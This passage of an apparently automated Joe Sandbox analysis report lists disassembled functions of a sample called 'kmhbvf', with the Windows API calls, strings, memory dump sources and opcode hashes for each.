SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00F57D97
SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00F57DAC
SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00F57DB9

Strings

msctls_trackbar32, xrefs: 00F57D6E

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: MessageSend
String ID: msctls_trackbar32
API String ID: 3850602802-1010561917
Opcode ID: 86a82553e0b3dfc62368091373ba81c5ed8b2ec0677dea53dd67bc16e6b9232b
Instruction ID: 356146c151dc36b528ff8375ea32d768d6bb9a6d10f1e92b3d79e49c91b3d82a
Opcode Fuzzy Hash: 86a82553e0b3dfc62368091373ba81c5ed8b2ec0677dea53dd67bc16e6b9232b
Instruction Fuzzy Hash: 8411E372644308BADF20AF64DC05FEB77A9EF88B24F114119FF41A6090D672D811EB20

Uniqueness

Uniqueness Score: -1.00%

Function 00EE4BAA Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00EE4AF7,?), ref: 00EE4BB8
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00EE4BCA

Strings

kernel32.dll, xrefs: 00EE4BB3
Wow64RevertWow64FsRedirection, xrefs: 00EE4BC4

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32.dll
API String ID: 2574300362-1355242751
Opcode ID: 7baeadd05074fb9cfd73ebd3c3ac7757655c6c8ad57610d35a712bb99af8dc91
Instruction ID: bcfb1fd6a48818f84f8cba99b3284cca3841b8607f14d42f7d214bed26a895d7
Opcode Fuzzy Hash: 7baeadd05074fb9cfd73ebd3c3ac7757655c6c8ad57610d35a712bb99af8dc91
Instruction Fuzzy Hash: B1D0C7B04003168FD320AF32DC08B8772E5AF01344B20AC2AD4A2E2691EFB0C880DA00

Uniqueness

Uniqueness Score: -1.00%

Function 00EE4B77 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00EE4B44,?,00EE49D4,?,?,00EE27AF,?,00000001), ref: 00EE4B85
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00EE4B97

Strings

kernel32.dll, xrefs: 00EE4B80
Wow64DisableWow64FsRedirection, xrefs: 00EE4B91

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32.dll
API String ID: 2574300362-3689287502
Opcode ID: ea54bd2ee663566eaddbd5611fd208626c789da3d0ec1df0453261c92c6b3828
Instruction ID: 33bfd4297c2c9cd88647732da51b6441bb07faabe3d59a52b1439a7397be80cd
Opcode Fuzzy Hash: ea54bd2ee663566eaddbd5611fd208626c789da3d0ec1df0453261c92c6b3828
Instruction Fuzzy Hash: 88D017B09147168FD720AF32DC18B4776E4AF05355F259C2AD4A6E2690EAB0E880EA51

Uniqueness

Uniqueness Score: -1.00%

Function 00F51447 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(advapi32.dll,?,00F51696), ref: 00F51455
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00F51467

Strings

advapi32.dll, xrefs: 00F51450
RegDeleteKeyExW, xrefs: 00F51461

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 2574300362-4033151799
Opcode ID: 943f5e7f1e574d5b6471ad9c12add38c12d6b9a8e03e90160f38f7a3ebaf0326
Instruction ID: da488fe3425e9261010a4b632cf240ea9302dd809d0c707a6ecd35694bca226c
Opcode Fuzzy Hash: 943f5e7f1e574d5b6471ad9c12add38c12d6b9a8e03e90160f38f7a3ebaf0326
Instruction Fuzzy Hash: EDD01230910712CFD7209F75C84875776D4AF07396B11C82AD8E5D2950DAB0E4C4E751

Uniqueness

Uniqueness Score: -1.00%

Function 00EE55F0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00EE5E3D), ref: 00EE55FE
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00EE5610

Strings

GetNativeSystemInfo, xrefs: 00EE560A
kernel32.dll, xrefs: 00EE55F9

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetNativeSystemInfo$kernel32.dll
API String ID: 2574300362-192647395
Opcode ID: 96e737b1ac71837d628d0c9158d81ceafee2a70f72900ad7bba76585b35066a9
Instruction ID: 5682afa29c25631784bdd7e2f113ce31c321f0cac10fee845f21844940840e63
Opcode Fuzzy Hash: 96e737b1ac71837d628d0c9158d81ceafee2a70f72900ad7bba76585b35066a9
Instruction Fuzzy Hash: ABD01775920B179FE7209F32C90861776E5AF05359F259C2AD49AE2292EAB0C880DA51

Uniqueness

Uniqueness Score: -1.00%

Function 00F497CA Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,00000001,00F493DE,?,00F60980), ref: 00F497D8
GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00F497EA

Strings

kernel32.dll, xrefs: 00F497D3
GetModuleHandleExW, xrefs: 00F497E4

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetModuleHandleExW$kernel32.dll
API String ID: 2574300362-199464113
Opcode ID: 4d9102eab8989c12bafee3ccd493e4743cb8b28b77796af7f2557d0905e4357e
Instruction ID: f9e06f342f3e8d33e9065a20ac1539f5bda0ed6dd5cdd81c21c16d0e4767053d
Opcode Fuzzy Hash: 4d9102eab8989c12bafee3ccd493e4743cb8b28b77796af7f2557d0905e4357e
Instruction Fuzzy Hash: BED012709107138FD7205F31D88864776D4AF05391B258C2AD895D2251EFB0C480E711

Uniqueness

Uniqueness Score: -1.00%

Function 00F27D9B Relevance: 6.3, APIs: 4, Instructions: 333COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0244e57681386c8f15ed14a55fadd860350d699b872360d2b3667d5568d6407e
Instruction ID: d7a8ec51b266a1a0939b790708e9f9e06f3a111e8bf844fa8f6931be29b9feb0
Opcode Fuzzy Hash: 0244e57681386c8f15ed14a55fadd860350d699b872360d2b3667d5568d6407e
Instruction Fuzzy Hash: 64C1AF75A04226EFCB14DF94D884EAEB7B5FF48310B218598E806DB251DB31ED81EB90

Uniqueness

Uniqueness Score: -1.00%

Function 00F4E713 Relevance: 6.3, APIs: 4, Instructions: 307memoryCOMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?), ref: 00F4E7A7
CharLowerBuffW.USER32(?,?), ref: 00F4E7EA

Part of subcall function 00F4DE8E: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00F4DEAE

VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 00F4E9EA
_memmove.LIBCMT ref: 00F4E9FD

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: BuffCharLower$AllocVirtual_memmove
String ID:
API String ID: 3659485706-0
Opcode ID: 2ea0a62f0e73a43eac764cefb1c04883ee033423c04875021ad19a470bcc68af
Instruction ID: a6cfc8ba1d97b2e502e24c946ad646576fa781ab0598eafdd7b1d6980726df52
Opcode Fuzzy Hash: 2ea0a62f0e73a43eac764cefb1c04883ee033423c04875021ad19a470bcc68af
Instruction Fuzzy Hash: FAC15A71A083419FC714DF28C480A6ABBE5FF89724F14896EF899DB351D731E946CB82

Uniqueness

Uniqueness Score: -1.00%

Function 00F4877D Relevance: 6.3, APIs: 4, Instructions: 267COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00F487AD
CoUninitialize.OLE32 ref: 00F487B8

Part of subcall function 00F5DF09: CoCreateInstance.OLE32(00000018,00000000,00000005,00000028,?,?,?,?,?,00000000,00000000,00000000,?,00F48A0E,?,00000000), ref: 00F5DF71

VariantInit.OLEAUT32(?), ref: 00F487C3
VariantClear.OLEAUT32(?), ref: 00F48A94

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
String ID:
API String ID: 780911581-0
Opcode ID: 0fcd20485a76a75d6292928cee570df514bd4bc138ab3f70e429a5632ec8d508
Instruction ID: 84b95b87bb301e71dfed90b7afebbec0f470d854a2c6a92b3bc4bfa66c726641
Opcode Fuzzy Hash: 0fcd20485a76a75d6292928cee570df514bd4bc138ab3f70e429a5632ec8d508
Instruction Fuzzy Hash: 42A14575604B019FDB10DF14C481B2ABBE5FF88360F14884AF995AB3A1CB74ED42DB92

Uniqueness

Uniqueness Score: -1.00%

Function 00F2814E Relevance: 6.2, APIs: 4, Instructions: 231COMMON

Download Yara Rule

APIs

ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00F63C4C,?), ref: 00F28308
CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00F63C4C,?), ref: 00F28320
CLSIDFromProgID.OLE32(?,?,00000000,00F60988,000000FF,?,00000000,00000800,00000000,?,00F63C4C,?), ref: 00F28345
_memcmp.LIBCMT ref: 00F28366

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: FromProg$FreeTask_memcmp
String ID:
API String ID: 314563124-0
Opcode ID: 1bc6ae65d148d8e41e5a49ef5fb627e440fe5fc043085fa29c866594df549329
Instruction ID: 86a7094d1ae218dad72f8c582fef1c9f89fe312cfbc6058b6d274717e7f54405
Opcode Fuzzy Hash: 1bc6ae65d148d8e41e5a49ef5fb627e440fe5fc043085fa29c866594df549329
Instruction Fuzzy Hash: 37814871A01119EFCB04CFD4C884EEEB7B9FF89315F248598E516AB250DB71AE06DB60

Uniqueness

Uniqueness Score: -1.00%

Function 00F2749B Relevance: 6.2, APIs: 4, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00F274AC
SysAllocString.OLEAUT32(00000000), ref: 00F27555
VariantCopy.OLEAUT32 ref: 00F27584
VariantClear.OLEAUT32(?), ref: 00F275AB

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: Variant$AllocClearCopyInitString
String ID:
API String ID: 2808897238-0
Opcode ID: 099f5c799c451625cd8072bd1d56e8000a26921fa057de7f25adb648328c4c15
Instruction ID: 2767d82bb24eb2e74714198d8589d806a3ae68f3f89fe492a9d27e0b42024664
Opcode Fuzzy Hash: 099f5c799c451625cd8072bd1d56e8000a26921fa057de7f25adb648328c4c15
Instruction Fuzzy Hash: FE51D731608B169BCB20BF79A895B2DF7E4EF05320B30981FE556D72A1DF749840AB01

Uniqueness

Uniqueness Score: -1.00%

Function 00F4F4F6 Relevance: 6.2, APIs: 4, Instructions: 164processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00F4F526
Process32FirstW.KERNEL32(00000000,?), ref: 00F4F534

Part of subcall function 00EE1A36: _memmove.LIBCMT ref: 00EE1A77

Process32NextW.KERNEL32(00000000,?), ref: 00F4F5F4
CloseHandle.KERNEL32(00000000,?,?,?), ref: 00F4F603

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
String ID:
API String ID: 2576544623-0
Opcode ID: e926f10ff08940c82f95b1be763d5acd661eabc4c03811d8d646d1da069fa1ec
Instruction ID: d361878108c0ba2d3fcf5f65a7ac48b7ea328e64e0f9e8f63b591326cafb9217
Opcode Fuzzy Hash: e926f10ff08940c82f95b1be763d5acd661eabc4c03811d8d646d1da069fa1ec
Instruction Fuzzy Hash: 465190B15043149FD310EF20DC45E6BBBE8EF94710F10492EF995E72A1EB709909CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00F59E19 Relevance: 6.1, APIs: 4, Instructions: 140COMMON

Download Yara Rule

APIs

GetWindowRect.USER32 ref: 00F59E88
ScreenToClient.USER32 ref: 00F59EBB
MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00F59F28

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: Window$ClientMoveRectScreen
String ID:
API String ID: 3880355969-0
Opcode ID: 5f165ece22bdb897eb6b8a3bb6c83dd7aa9409211d2cad9b0bc382a6c8df590a
Instruction ID: 8c7dc463b6fadc8a7fb7d474c2f698b1c64e38e580f8b931224a0c7aac62d21c
Opcode Fuzzy Hash: 5f165ece22bdb897eb6b8a3bb6c83dd7aa9409211d2cad9b0bc382a6c8df590a
Instruction Fuzzy Hash: 04514E34A04209EFCF14DF54C8859AE7BF6FB44321F248159FA25D72A0D771AD45EB90

Uniqueness

Uniqueness Score: -1.00%

Function 00EF492A Relevance: 6.1, APIs: 4, Instructions: 136COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00EF49C0
__flush.LIBCMT ref: 00EF49E0
__write.LIBCMT ref: 00EF4A13
__flsbuf.LIBCMT ref: 00EF4A41

Part of subcall function 00EF8D58: __getptd_noexit.LIBCMT ref: 00EF8D58

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: __flsbuf__flush__getptd_noexit__write_memmove
String ID:
API String ID: 2782032738-0
Opcode ID: a7c34a093fdd5ab58b6ffc98053f9d5ae49c5acda348f4cccab4e545be81f79d
Instruction ID: 1e81d031bc3da09a02a3df7f5d8bd0dc989b3e5280945b9cfcf9f102e6361bca
Opcode Fuzzy Hash: a7c34a093fdd5ab58b6ffc98053f9d5ae49c5acda348f4cccab4e545be81f79d
Instruction Fuzzy Hash: 3041D8B1700B0E9BDF188E69C8805BF77E5AF80364B24917DE659E76C0E771DE408744

Uniqueness

Uniqueness Score: -1.00%

Function 00F2A638 Relevance: 6.1, APIs: 4, Instructions: 129windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00F2A68A
__itow.LIBCMT ref: 00F2A6BB

Part of subcall function 00F2A90B: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00F2A976

SendMessageW.USER32(?,0000110A,00000001,?), ref: 00F2A724
__itow.LIBCMT ref: 00F2A77B

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: MessageSend$__itow
String ID:
API String ID: 3379773720-0
Opcode ID: c511180c862f38a0c115cf5c5871b4ddf5f0af22a0988fbb513ba58de885a962
Instruction ID: 9359651cd6999f3c1edad103bcded5b16b98437d3884242f41d5628cac7d6439
Opcode Fuzzy Hash: c511180c862f38a0c115cf5c5871b4ddf5f0af22a0988fbb513ba58de885a962
Instruction Fuzzy Hash: 9341B174A0025CABDF10EF61DC46BEE7BF9EF44760F040069F905A3291DB749984DBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00F47095 Relevance: 6.1, APIs: 4, Instructions: 127networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000002,00000011), ref: 00F470BC
WSAGetLastError.WSOCK32(00000000), ref: 00F470CC

Part of subcall function 00ED4D37: __itow.LIBCMT ref: 00ED4D62
Part of subcall function 00ED4D37: __swprintf.LIBCMT ref: 00ED4DAC

#21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00F47130
WSAGetLastError.WSOCK32(00000000), ref: 00F4713C

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: ErrorLast$__itow__swprintfsocket
String ID:
API String ID: 2214342067-0
Opcode ID: 5cfe46ad897f1b091cead563775883232038c51af5a7c52f5725fed27085664f
Instruction ID: ceae0aa576138cd5631b205d38d3a1e3603079581268c21ee7049a4dffa82813
Opcode Fuzzy Hash: 5cfe46ad897f1b091cead563775883232038c51af5a7c52f5725fed27085664f
Instruction Fuzzy Hash: 1A41CEB17002106FEB20BF24DC8AF2A77E5DB54B10F148459FA19AB3D2DBB49C029B91

Uniqueness

Uniqueness Score: -1.00%

Function 00F46B05 Relevance: 6.1, APIs: 4, Instructions: 116COMMON

Download Yara Rule

APIs

#16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,00F60980), ref: 00F46B92
_strlen.LIBCMT ref: 00F46BC4

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: _strlen
String ID:
API String ID: 4218353326-0
Opcode ID: be280ddf50e526eddfc8365d5be025c004c9e873ac627926c3e2f1cc23481b4c
Instruction ID: 5dd8f9d3f4c37af28d706c8e0ce4bab09aa485b76f246e88f8d48e6f78d9c21d
Opcode Fuzzy Hash: be280ddf50e526eddfc8365d5be025c004c9e873ac627926c3e2f1cc23481b4c
Instruction Fuzzy Hash: 6741C071A00208AFCB14FB64DCC1EAEB7E9EF55310F148155F91AEB292EB30AD41DB91

Uniqueness

Uniqueness Score: -1.00%

Function 00F3BE37 Relevance: 6.1, APIs: 4, Instructions: 111fileCOMMON

Download Yara Rule

APIs

CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00F3BEE1
GetLastError.KERNEL32(?,00000000), ref: 00F3BF07
DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00F3BF2C
CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00F3BF58

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
